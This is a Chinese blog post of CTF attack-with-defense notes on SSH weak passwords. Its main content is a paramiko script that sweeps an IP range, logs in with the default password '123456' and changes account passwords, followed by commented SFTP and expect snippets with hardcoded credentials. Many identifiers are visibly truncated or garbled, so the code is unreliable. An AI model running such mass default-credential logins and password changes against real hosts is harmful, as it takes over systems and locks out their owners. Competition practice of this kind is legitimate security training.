ctf之AWD(1)_ssh弱⼝令ctf之AWD(1) ssh弱⼝令
批量修改ssh初始密码
要点
passwd的--stdin参数ubuntu不⽀持,chpasswd命令需要root权限
echo"root"|passwd --stdin apache
更改密码⽤sh -c passwd命令,不直接⽤passwd
控制初始登录ssh的欢迎banner
控制收发包速度和 CRLF ,通过jupyter快速调试
git paramiko源码 ,查看example和doc
git clone github/paramiko/paramiko.git
pexpect库的pexpect.spawn在Windows不可⽤
Python⾃动化运维:技术与最佳实践:
python3 script
# -*- coding:utf-8 -*-
import paramiko
import time
import queue
'''
passwd的--stdin参数ubuntu不⽀持
chpasswd
joe:abcdef
echo "root" |passwd --stdin apache
'''
USER =['root','apache','root1','ctf','student']
PASSWORD_SSH ='123456'
PASSWORD_NEW ='aser1234..'
COLOR_GREEN ='\033[1;32;40m'
COLOR_RED ='\033[1;31;40m'
def get_ip(ip1, ip2):
ipaddr_queue = queue.Queue()
for i in range(int(ip1),int(ip2)):
full_ip ='192.168.232.'+str(i)
ipaddr_queue.put(full_ip)
return ipaddr_queue
def write_ip(lfile, data):
try:
f =open(lfile,'w+')
f.write(data +' '+ ime()+'\n')
f.close()
except Exception as e:
print(COLOR_RED +'[-]:写⼊失败'+str(e))
def ssh_exec(ip, port):
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
try:
try:
#command1 = 'echo %s|passwd --stdin %s' % (PASSWORD_NEW, USER[0])
stdin, stdout, stderr = _command(command1)
out, err = ad(), ad()
if out:
print(COLOR_GREEN +'[+]:'+str(ip)+'\n'+ out.decode('utf-8').strip())
write_ip('d:/',str(ip))
else:
print(COLOR_RED +'[-]: 命令执⾏失败')
except paramiko.ssh_exception.AuthenticationException as e:
print(COLOR_RED +'[-]:'+str(ip)+'账号密码错误!')
root的初始密码pass
def ssh_invoke_shell(ip, port):
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
try:
interact = ssh.invoke_shell()
interact.settimeout(10)
def send_recv(data):
interact.send(data)
time.sleep(0.5)
v_ready():
v(1024).decode('utf-8'))
else:
print('recv failed')
send_recv('sh -c passwd\r')
send_recv(PASSWORD_SSH +'\r')
send_recv(PASSWORD_NEW +'\r')
send_recv(PASSWORD_NEW +'\r')
write_ip('d:/',str(ip))
interact.shutdown(2)#0: 停⽌接收 1: 停⽌发送 2: 停⽌接收和发送数据it_status_ready():
print("EXIT :", v_exit_status())
else:
pass
except paramiko.ssh_exception.AuthenticationException as e:
print('[-]:'+'账号密码错误!')
def change_ssh(ip1, ip2):
tmp_queue = get_ip(ip1, ip2)
while tmp_queue.qsize()>0:
try:
ip = _nowait()
#ssh_exec(ip, 22)
ssh_invoke_shell(ip,22)
except Exception as e:
print(COLOR_RED +'[-]:'+'error'+str(e))
pass
if __name__ =='__main__':
#change_ssh(129, 130)
change_ssh(141,142)
'''
#sftp
transport = paramiko.Transport(('192.168.1.111',22))
sftp = paramiko.SFTPClient.from_transport(transport)
# 将/ 上传⾄服务器 /
sftp.put('/', '/')
# 将/ 下载到本地 /
<('/', '/')
transport.close()
'''
##基于公钥密钥上传下载
'''
private_key = paramiko.RSAKey.from_private_key_file('/root/.ssh/id_rsa') transport = paramiko.Transport(('10.0.3.56', 22))
sftp = paramiko.SFTPClient.from_transport(transport)
# 将/ 上传⾄服务器 /
sftp.put('/', '/')
# 将/ 下载到本地 /
<('/', '/')
transport.close()
'''
'''
###⾃动ssh/scp脚本
如果需要从A,到B,然后才能够到C,那么需要ssh和scp两次,是⽐较⿇烦的。ssh⾃动登录:
#!/usr/bin/expect -f
set timeout -1
spawn ssh root@B
expect "password:"
send "pppppp\r"
expect "]*"
send "ssh root@C\r"
expect "password:"
send "pppppp\r"
interact
'''
发表评论